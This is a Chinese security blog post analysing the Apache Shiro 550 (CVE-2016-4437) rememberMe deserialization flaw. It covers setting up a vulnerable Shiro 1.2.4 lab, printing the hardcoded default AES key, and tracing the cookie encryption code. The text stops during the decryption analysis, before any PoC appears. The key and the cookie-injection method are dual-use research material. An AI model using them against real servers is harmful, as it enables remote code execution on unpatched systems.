<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Shiro 550 反序列化漏洞 详细分析+poc编写 | Zeo's Security Lab</title><meta name="author" content="Zeo"><meta name="copyright" content="Zeo"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="ffffff"><meta name="description" content="0x00 前言shiro反序列化漏洞这个从 shiro 550 开始，在2016年就爆出来, 但是到现在在各种攻防演练中也起到了显著作用 这个漏洞一直都很好用，特别是一些红蓝对抗HW的下边界突破很好用 遂研究一下这个漏洞的成因和分析一下代码 0x01 Shiro 550 漏洞描述Apache Shiro RememberMe 反序列化导致的命令执行漏洞 Apache Shiro是一个强大且易用">
<meta property="og:type" content="article">
<meta property="og:title" content="Shiro 550 反序列化漏洞 详细分析+poc编写">
<meta property="og:url" content="https://godzeo.github.io/2020/09/03/Shiro%20550%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90+poc%E7%BC%96%E5%86%99/index.html">
<meta property="og:site_name" content="Zeo&#39;s Security Lab">
<meta property="og:description" content="0x00 前言shiro反序列化漏洞这个从 shiro 550 开始，在2016年就爆出来, 但是到现在在各种攻防演练中也起到了显著作用 这个漏洞一直都很好用，特别是一些红蓝对抗HW的下边界突破很好用 遂研究一下这个漏洞的成因和分析一下代码 0x01 Shiro 550 漏洞描述Apache Shiro RememberMe 反序列化导致的命令执行漏洞 Apache Shiro是一个强大且易用">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp">
<meta property="article:published_time" content="2020-09-03T10:51:50.000Z">
<meta property="article:modified_time" content="2022-11-28T12:25:22.942Z">
<meta property="article:author" content="Zeo">
<meta property="article:tag" content="WEB安全">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="内网">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="二进制">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp"><link rel="shortcut icon" href="/img/WX20211124-162855.png"><link rel="canonical" href="https://godzeo.github.io/2020/09/03/Shiro%20550%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90+poc%E7%BC%96%E5%86%99/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Shiro 550 反序列化漏洞 详细分析+poc编写',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-11-28 20:25:22'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', 'ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Zeo's Security Lab" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Zeo's Security Lab</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Shiro 550 反序列化漏洞 详细分析+poc编写</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-09-03T10:51:50.000Z" title="发表于 2020-09-03 18:51:50">2020-09-03</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-11-28T12:25:22.942Z" title="更新于 2022-11-28 20:25:22">2022-11-28</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><span id="more"></span>

<h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>shiro反序列化漏洞这个从 shiro 550 开始，在2016年就爆出来, 但是到现在在各种攻防演练中也起到了显著作用</p>
<p>这个漏洞一直都很好用，特别是一些红蓝对抗HW的下边界突破很好用</p>
<p>遂研究一下这个漏洞的成因和分析一下代码</p>
<h1 id="0x01-Shiro-550-漏洞描述"><a href="#0x01-Shiro-550-漏洞描述" class="headerlink" title="0x01 Shiro 550 漏洞描述"></a>0x01 Shiro 550 漏洞描述</h1><p>Apache Shiro RememberMe 反序列化导致的命令执行漏洞</p>
<p>Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理</p>
<p>编号：Shiro-550, CVE-2016-4437</p>
<p>版本：Apache Shiro (由于密钥泄露的问题, 部分高于1.2.4版本的Shiro也会受到影响)</p>
<h1 id="0x02-环境搭建"><a href="#0x02-环境搭建" class="headerlink" title="0x02 环境搭建"></a>0x02 环境搭建</h1><h2 id="基础环境"><a href="#基础环境" class="headerlink" title="基础环境"></a>基础环境</h2><p>编辑器：IDEA 2020</p>
<p>java版本：jdk1.7.0_80</p>
<p>Server版本 : Tomcat 8.5.56</p>
<p>shiro版本：shiro-root-1.2.4</p>
<p>组件：commons-collections4</p>
<h2 id="搭建过程"><a href="#搭建过程" class="headerlink" title="搭建过程"></a>搭建过程</h2><p>如果闲配置麻烦，也可以直接用我弄好的GitHub地址</p>
<p><a target="_blank" rel="noopener" href="https://github.com/godzeo/shiro/_1.2.4/_sample.git">https://github.com/godzeo/shiro\_1.2.4\_sample.git</a></p>
<h3 id="正常搭建"><a href="#正常搭建" class="headerlink" title="正常搭建"></a>正常搭建</h3><p>直接下载：</p>
<p><a target="_blank" rel="noopener" href="https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4">https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4</a></p>
<p>下载好以后直接解压</p>
<p>然后偷偷的进入samples&#x2F;web目录，直接修改pom文件，主要修改下面这些</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">&lt;dependencies&gt;</span><br><span class="line">    &lt;dependency&gt;</span><br><span class="line">        &lt;groupId&gt;javax.servlet&lt;/groupId&gt;</span><br><span class="line">        &lt;artifactId&gt;jstl&lt;/artifactId&gt;</span><br><span class="line">        &lt;!--  这里需要将jstl设置为<span class="number">1.2</span> --&gt;</span><br><span class="line">        &lt;version&gt;<span class="number">1.2</span>&lt;/version&gt;</span><br><span class="line">        &lt;scope&gt;runtime&lt;/scope&gt;</span><br><span class="line">    &lt;/dependency&gt;</span><br><span class="line">.....</span><br><span class="line">    &lt;dependency&gt;</span><br><span class="line">        &lt;groupId&gt;org.apache.commons&lt;/groupId&gt;</span><br><span class="line">        &lt;artifactId&gt;commons-collections4&lt;/artifactId&gt;</span><br><span class="line">        &lt;version&gt;<span class="number">4.0</span>&lt;/version&gt;</span><br><span class="line">    &lt;/dependency&gt;</span><br><span class="line">&lt;dependencies&gt;</span><br></pre></td></tr></table></figure>

<p>然后部署，我就直接使用IEDA 部署了</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDMxMTExMzAucG5n?x-oss-process=image/format,png" alt="image-20200903111130024"></p>
<h2 id="坑点："><a href="#坑点：" class="headerlink" title="坑点："></a>坑点：</h2><p>如果有使用maven打包搭建的话，可能遇到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Failed to execute goal org.apache.maven.plugins:maven-toolchains-plugin:1.1:toolchain (default) on project samples-web: Misconfigured toolchains.</span><br></pre></td></tr></table></figure>

<p>这应该是maven打包这里要1.6的环境，但运行不影响</p>
<p>需要修改 maven&#x2F;conf&#x2F;toolchains.xml 的代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;toolchain&gt;</span><br><span class="line">    &lt;type&gt;jdk&lt;/type&gt;</span><br><span class="line">    &lt;provides&gt;</span><br><span class="line">      &lt;version&gt;1.6&lt;/version&gt;</span><br><span class="line">      &lt;vendor&gt;sun&lt;/vendor&gt;</span><br><span class="line">    &lt;/provides&gt;</span><br><span class="line">    &lt;configuration&gt;</span><br><span class="line">      &lt;jdkHome&gt;/Library/Java/JavaVirtualMachines/1.6.0.jdk&lt;/jdkHome&gt;</span><br><span class="line">    &lt;/configuration&gt;</span><br><span class="line">&lt;/toolchain&gt;</span><br></pre></td></tr></table></figure>

<p>我们还需要产生payload的 ysoserial</p>
<p>ysoserial项目源码在这里<a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial">https://github.com/frohoff/ysoserial</a> ，然后自己编译， 也可直接下载编译好的release。</p>
<h1 id="0x03-代码分析"><a href="#0x03-代码分析" class="headerlink" title="0x03 代码分析"></a>0x03 代码分析</h1><p>简单介绍一下漏洞：</p>
<p>简单介绍利用：</p>
<ul>
<li><p>通过在cookie的rememberMe字段中插入恶意payload，</p>
</li>
<li><p>触发shiro框架的rememberMe的反序列化功能，导致任意代码执行。</p>
</li>
<li><p>shiro 1.2.24中，提供了硬编码的AES密钥：kPH+bIxk5D2deZiIxcaaaA&#x3D;&#x3D;</p>
</li>
<li><p>由于开发人员未修改AES密钥而直接使用Shiro框架，导致了该问题</p>
</li>
</ul>
<h2 id="加密过程"><a href="#加密过程" class="headerlink" title="加密过程"></a>加密过程</h2><p>找入口点的话，就是这个漏洞一直提的硬编码地方下手，然后稍微回溯就找到，我们也只需关注rememberMe这个处理就好了</p>
<p>首先找到&#x2F;shiro-core-1.2.4.jar!&#x2F;org&#x2F;apache&#x2F;shiro&#x2F;mgt&#x2F;AbstractRememberMeManager.class，该类位于shiro-core模块</p>
<p>我们发现了，我们最常见的，常常提到的的key，那么入口点可能在这里</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">byte</span>[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode(<span class="string">&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIwOTMyMjQucG5n?x-oss-process=image/format,png" alt="image-20200902093224310"></p>
<ul>
<li>他是继承了RememberMeManager类，那么我们向上溯源：找到RememberMeManager类的onSuccessfulLogin方法，看名字就直接是登陆成功的处理</li>
<li>那我们下一个断点，研究一下这个rememberme的加密和处理流程，是个什么原理</li>
</ul>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDA2MzEucG5n?x-oss-process=image/format,png" alt="image-20200902100631808"></p>
<p>所以我们登陆一下，debug开启！记得要勾选Remember Me哦</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDEzMjkucG5n?x-oss-process=image/format,png" alt="image-20200902101329183"></p>
<p>然后我们收到数据了，直接步入跟进</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDE0MTkucG5n?x-oss-process=image/format,png" alt="image-20200902101419301"></p>
<p>转入了forgetIdentity函数，处理request和response请求，继续跟进this.forgetIdentity方法，进入了</p>
<p>[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EM2oRAEz-1599130237592)(…&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20200902102404236.png)]</p>
<p>继续跟进this.forgetIdentity方法，进入了getCookie的removeFrom方法，跟进removeFrom方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">this</span>.getCookie().removeFrom(request, response);</span><br></pre></td></tr></table></figure>

<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDI0MTgucG5n?x-oss-process=image/format,png" alt="image-20200902102418678"></p>
<ul>
<li>这里获取看配置信息，最后addCookieHeader放到了返回包中的cookie头中，其中就有我们熟悉的，deleteMe字段和rememberMe字段，也就是我们指纹识别最简单的两种方法的原理</li>
</ul>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDMyMjMucG5n?x-oss-process=image/format,png" alt="image-20200902103223302"></p>
<ul>
<li>然后这一阶段结束了，随后回到刚刚的onSuccessfulLogin方法中，这个isRememberMe主要是检查选择了remember me这个按钮没有，随后步入 rememberIdentity 方法，看看做了什么</li>
</ul>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDM1MDEucG5n?x-oss-process=image/format,png" alt="image-20200902103501055"></p>
<p>在rememberIdentity方法中，authcInfo的值就是我们输入root用户名，继续跟进rememberIdentity函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">PrincipalCollection principals = this.getIdentityToRemember(subject, authcInfo);</span><br><span class="line">this.rememberIdentity(subject, principals);</span><br></pre></td></tr></table></figure>

<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDM4MDYucG5n?x-oss-process=image/format,png" alt="image-20200902103806491"></p>
<p>进入rememberIdentity方法后发现，一个函数就是转化为bytes，跟进convertPrincipalsToBytes</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">rememberIdentity</span><span class="params">(Subject subject, PrincipalCollection accountPrincipals)</span> &#123;</span><br><span class="line">    <span class="type">byte</span>[] bytes = <span class="built_in">this</span>.convertPrincipalsToBytes(accountPrincipals);</span><br><span class="line">    <span class="built_in">this</span>.rememberSerializedIdentity(subject, bytes);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDQ2MTQucG5n?x-oss-process=image/format,png" alt="image-20200902104614572"></p>
<ul>
<li>进入convertPrincipalsToBytes方法，发现它会序列化，而且序列化的是传入的root用户名</li>
<li>后续跟进看了一下，就是普通的序列化，没有什么特殊的操作，就不继续写了</li>
<li>然后调用encrypt方法加密序列化后的二进制字节</li>
<li>这个必须得跟进看一下encrypt方法吧</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="type">byte</span>[] convertPrincipalsToBytes(PrincipalCollection principals) &#123;</span><br><span class="line">    <span class="type">byte</span>[] bytes = <span class="built_in">this</span>.serialize(principals);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">this</span>.getCipherService() != <span class="literal">null</span>) &#123;</span><br><span class="line">        bytes = <span class="built_in">this</span>.encrypt(bytes);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>发现CipherService cipherService &#x3D; this.getCipherService()，就是获取密码服务的意思，那么看一下获取了这么，看一结果发现是AES加密方法，而且是AES&#x2F;CBC&#x2F;PKCS5Padding</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="type">byte</span>[] encrypt(<span class="type">byte</span>[] serialized) &#123;</span><br><span class="line">    <span class="type">byte</span>[] value = serialized;</span><br><span class="line">    <span class="type">CipherService</span> <span class="variable">cipherService</span> <span class="operator">=</span> <span class="built_in">this</span>.getCipherService();</span><br><span class="line">    <span class="keyword">if</span> (cipherService != <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="type">ByteSource</span> <span class="variable">byteSource</span> <span class="operator">=</span> cipherService.encrypt(serialized, <span class="built_in">this</span>.getEncryptionCipherKey());</span><br><span class="line">        value = byteSource.getBytes();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> value;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMDU2MzkucG5n?x-oss-process=image/format,png" alt="image-20200902105639625"></p>
<p>那么下一句话就是：加密这个传入的数据的方法了。</p>
<p>再看这就话this.getEncryptionCipherKey()，明显这是获取秘钥了，直接跟进getEncryptionCipherKey</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ByteSource</span> <span class="variable">byteSource</span> <span class="operator">=</span> cipherService.encrypt(serialized, <span class="built_in">this</span>.getEncryptionCipherKey());</span><br></pre></td></tr></table></figure>

<p>这个找key 就是在这个类中反复横跳，就可以找到，就详细看了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">this.encryptionCipherKey</span><br><span class="line">setEncryptionCipherKey（）</span><br><span class="line">setCipherKey(byte[] cipherKey)---setEncryptionCipherKey（）</span><br><span class="line">this.setCipherKey(DEFAULT_CIPHER_KEY_BYTES)</span><br></pre></td></tr></table></figure>

<p>最终溯源到 getEncryptionCipherKey 就是开头中的 DEFAULT_CIPHER_KEY_BYTES，也就是我们一开始第一个提到的kPH+bIxk5D2deZiIxcaaaA&#x3D;&#x3D;这个key</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMTA3NDEucG5n?x-oss-process=image/format,png" alt="image-20200902110741059"></p>
<p>随后就传入 encrypt函数（root ，刚刚获取的key），这时就加密方法了！！！</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> ByteSource <span class="title function_">encrypt</span><span class="params">(<span class="type">byte</span>[] plaintext, <span class="type">byte</span>[] key)</span> &#123;</span><br><span class="line">    <span class="type">byte</span>[] ivBytes = <span class="literal">null</span>;</span><br><span class="line">  </span><br><span class="line">   <span class="comment">//生成初始化向量，随后 generate:TURE</span></span><br><span class="line">    <span class="type">boolean</span> <span class="variable">generate</span> <span class="operator">=</span> <span class="built_in">this</span>.isGenerateInitializationVectors(<span class="literal">false</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (generate) &#123;</span><br><span class="line">      	 </span><br><span class="line">      	<span class="comment">//产生初始化向量</span></span><br><span class="line">        ivBytes = <span class="built_in">this</span>.generateInitializationVector(<span class="literal">false</span>);</span><br><span class="line">      </span><br><span class="line">      	<span class="comment">//异常，不会进入的</span></span><br><span class="line">        <span class="keyword">if</span> (ivBytes == <span class="literal">null</span> || ivBytes.length == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">IllegalStateException</span>(<span class="string">&quot;Initialization vector generation is enabled - generated vectorcannot be null or empty.&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">		<span class="comment">//再跟进就是更加具体的方法了，基本的加密逻辑已知 序列化root key 然后还有iv</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">this</span>.encrypt(plaintext, key, ivBytes, generate);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>加密后数据一直向上回溯，直到 rememberIdentity这个方法下有个 rememberSerializedIdentity方法要跟如，因为这个是记住序列化身份的功能</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMTMyMzIucG5n?x-oss-process=image/format,png" alt="image-20200902113232687"></p>
<p>跟如这个方法，就基本上到了加密的最后一步，把刚刚加密的数据base64，然后都加入到cookie里面</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxMTM0MjMucG5n?x-oss-process=image/format,png" alt="image-20200902113423550"></p>
<h2 id="解密过程："><a href="#解密过程：" class="headerlink" title="解密过程："></a>解密过程：</h2><p>现在继续研究解密过程：</p>
<ul>
<li>首先确定切入点</li>
<li>我选择从获取到客户端数据开始分析 ，那就是 org.apache.shiro.mgt.AbstractRememberMeManager 类的 getRememberedPrincipals 方法下断点</li>
<li>随后在页面随便刷新一下，就可以触发这个方法</li>
</ul>
<p>直接跟进 getRememberedSerializedIdentity(subjectContext) 方法，看看从数据中，都获取了什么</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNDAxMjAucG5n?x-oss-process=image/format,png" alt="image-20200902140120404"></p>
<p>这个getRememberedSerializedIdentity方法中 有一个this.getCookie().readValue(request, response)</p>
<p>这是要读取cookice中的数据了，这必须跟入了</p>
